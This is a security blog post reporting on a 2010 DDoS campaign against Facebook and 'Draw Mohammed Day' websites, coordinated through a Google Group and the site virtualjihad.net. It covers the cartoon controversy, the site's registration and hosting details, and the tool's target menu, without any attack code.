The Google Group "Muslims United" was created May 19th and has been actively attacking "offensive" websites. The main banner proclaims the site to be the "Anti-Draw-Muhammad (P.B.U.H.) -DAY", and currently has 1800 messages. Several of these relate to the "virtualjihad.net" website, where the DDOS tool is included.







VirtualJihad.net was registered on May 19th from the website "www.secsupport.com", a reseller for Directi's PublicDomainRegistry.com.

The website is hosted on the IP, 75.126.169.149, hosted by SoftLayer.com, right here in the USA.

The tool has a pull-down menu, allowing the user to choose whether he wants to attack "www.muhammadture.com", "www.drawmuhammadday.com", or "www.facebook.com".

Their website claims they have 34,306 people actively attacking with their tool at this time. The organizers, using the email "info@virtualjihad.net", claim to be reachable via MSN, GoogleTalk, or Skype as well as email.
Read More
Posted in | No comments

VirtualJihad against Facebook

Posted on 11:38 by Unknown
On May 20th, a group who claim to be motivated by various "Freedom of Expression" announced that they were holding "Everybody Draw Mohammad Day". As everyone knows by know, on September 30, 2005, a Danish newspaper chose to publish several cartoons of the Prophet Mohammed, including one of the prophet with his turban containing a bomb, which was drawn by Kurt Westergaard. This was the first many Westerners learned of the Islamic tradition that the prophet should never be depicted. The controversy has continued since then, with various papers reprinting the cartoons, and various Islamic nations then banning those papers, or calling for acts of violence against their editors. In January of 2010, Westergaard's home was broken into by an Islamic man who chopped through his door with an axe and desired to kill him with a knife.

The current "Everybody Draw Mohammed Day" craze was not inspired by Westergaard, but rather by death threats against the SouthPark artists, Matt Stone and Trey Parker, who depicted the Prophet Mohammed wearing a bear suit. Seattle-based cartoonist Molly Norris ran a cartoon suggesting that May 20th, be declared "Everybody Draw Mohammed Day" sponsored by "Citizens Against Citizens Against Humor or CACAH", which she has now retracted by scribbling notes on her own cartoon:



Unfortunately for Molly, many folks took her seriously, creating a special website to receive their submitted drawings, and more relevantly to our topic today, they also created a Facebook group, "Everybody Draw Mohammed Day."




The creation of the Facebook Group lead to several national bans of Facebook, including bans by Pakistan, Bangladesh, and the United Arab Eremites. The UAE and Saudi Arabia both made "line item veto" bans blocking only the offending group on Facebook, while the first two banned the entire website. (Update: Pakistan lifted their "blanket" ban on May 31st after Facebook actually censored the offending group.)




Pakistani media reported that "hacking fraternities" were being formed to "take revenge" on the "blasphemous companies". Pakistani residents have reported receiving SMS text messages encouraging them to participate in DDOS attacks. The website "drawmohammed.com" has also been repeatedly defaced by Islamic hackers since this event began.

Perhaps the most outrageous response has been the encouragement to download the attack tool that is being spread to help people DDOS.

The Google Group "Muslims United" was created May 19th and has been actively attacking "offensive" websites. The main banner proclaims the site to be the "Anti-Draw-Muhammad (P.B.U.H.) -DAY", and currently has 1800 messages. Several of these relate to the "virtualjihad.net" website, where the DDOS tool is included.





VirtualJihad.net was registered on May 19th from the website "www.secsupport.com", a reseller for Directi's PublicDomainRegistry.com.

The website is hosted on the IP, 75.126.169.149, hosted by SoftLayer.com, right here in the USA.

The tool has a pull-down menu, allowing the user to choose whether he wants to attack "www.muhammadture.com", "www.drawmuhammadday.com", or "www.facebook.com".

Their website claims they have 34,306 people actively attacking with their tool at this time. The organizers, using the email "info@virtualjihad.net", claim to be reachable via MSN, GoogleTalk, or Skype as well as email.
Read More
Posted in facebook, pharmaceuticals | No comments
Newer Posts Older Posts Home
Subscribe to: Posts (Atom)

Popular Posts

  • From Russia, With Love . . . new Postcard spam spies on your PC
    Isn't it nice to have friends who send you postcards? The UAB Spam Data Mine is especially fortunate in that way. Beginning the evenin...
  • Happy New Year! Here's a Virus! (New Year's Postcard malware)
    I've been busy this week looking at the various defacements (see ComputerWorld , and ABC News ) and other cyber attacks (see yesterday...
  • Tempting Photo Attachments Lead to Fake AV
    One of today's largest malicious spam campaigns continued an occasional theme we've been seeing for a few weeks. A subject line, fo...
  • A Prominent American Express Phish
    Every once in a while we see a spam campaign where we dig in to the complexity, expecting to find malware, and find that the criminal has ju...
  • Fake AV Malware Hits the Android
    Mobile Defender - the last line of protection Having studied malware delivered by spam for the past seven years, it is a fairly rare event f...
  • When Parked Domains Still Infect - Internet.bs and ZeroPark
    Last night I was discussing the Kelihos botnet with some friends. There had been several previous attempts to “Kill Kelihos” and I decided ...
  • Cross Brand Intelligence and Phishing
    While there is certainly a reason to shut down any site imitating your company as fast as possible, we have to always consider what the impl...
  • Anonymous, #OpBankster, and the Too Many Nancy's Problem
    The current Anonymous "#OpBanksters" seems to have very little in common with the original operation by the Anonymous Portuguese g...
  • Vista Security Features
    BitLocker Drive Encryption A Real-world Windows Vista BitLocker Tip BitLocker Drive Encryption BitLocker Drive Encryption Frequently Asked Q...
  • 2008: Looking back on a Year of Spam and Malware
    Happy New Year! As we get ready for the New Year, there are quite a few security folks making predictions for 2009. I think my friend Dan...

Categories

  • Blogs
  • Calendar
  • china
  • Communities
  • computer security careers
  • conficker
  • cyberwar
  • digital certificates
  • Drivers
  • email
  • Excel 2007
  • facebook
  • fake av
  • Features
  • Firewall
  • Gadgets
  • gumblar
  • Hardware
  • Hotmail
  • IE7
  • Internet Explorer 7
  • koobface
  • law enforcement
  • malware
  • Microsoft
  • Outlook
  • pharmaceuticals
  • phishing
  • PowerPoint 2007
  • public policy
  • Ready Boost
  • ReadyBoost
  • Security
  • Sidebar
  • Software
  • spam
  • Tutorials
  • twitter
  • twitter malware
  • USB
  • Virtual PC
  • Vista
  • waledac
  • Wallpaper
  • Websites
  • Windows
  • Windows Live
  • Windows Vista
  • Word 2007
  • zbot

Blog Archive

  • ▼  2013 (17)
    • ▼  November (1)
      • Tempting Photo Attachments Lead to Fake AV
    • ►  October (1)
    • ►  September (1)
    • ►  August (3)
    • ►  July (1)
    • ►  June (1)
    • ►  May (5)
    • ►  April (3)
    • ►  March (1)
  • ►  2012 (18)
    • ►  August (1)
    • ►  June (1)
    • ►  May (7)
    • ►  April (2)
    • ►  March (7)
  • ►  2011 (28)
    • ►  November (3)
    • ►  October (1)
    • ►  August (4)
    • ►  July (6)
    • ►  June (1)
    • ►  May (2)
    • ►  April (2)
    • ►  March (6)
    • ►  February (1)
    • ►  January (2)
  • ►  2010 (80)
    • ►  December (6)
    • ►  November (10)
    • ►  October (6)
    • ►  September (12)
    • ►  August (5)
    • ►  July (4)
    • ►  June (11)
    • ►  April (7)
    • ►  March (8)
    • ►  February (4)
    • ►  January (7)
  • ►  2009 (93)
    • ►  December (12)
    • ►  November (11)
    • ►  October (16)
    • ►  September (7)
    • ►  July (5)
    • ►  June (10)
    • ►  May (2)
    • ►  April (7)
    • ►  March (7)
    • ►  February (6)
    • ►  January (10)
  • ►  2008 (109)
    • ►  December (7)
    • ►  November (17)
    • ►  October (12)
    • ►  September (10)
    • ►  August (23)
    • ►  July (14)
    • ►  June (3)
    • ►  May (8)
    • ►  April (6)
    • ►  March (2)
    • ►  February (3)
    • ►  January (4)
  • ►  2007 (37)
    • ►  December (3)
    • ►  November (9)
    • ►  October (3)
    • ►  September (2)
    • ►  August (5)
    • ►  July (5)
    • ►  April (2)
    • ►  March (2)
    • ►  February (2)
    • ►  January (4)
  • ►  2006 (5)
    • ►  December (2)
    • ►  October (3)
Powered by Blogger.

About Me

Unknown
View my complete profile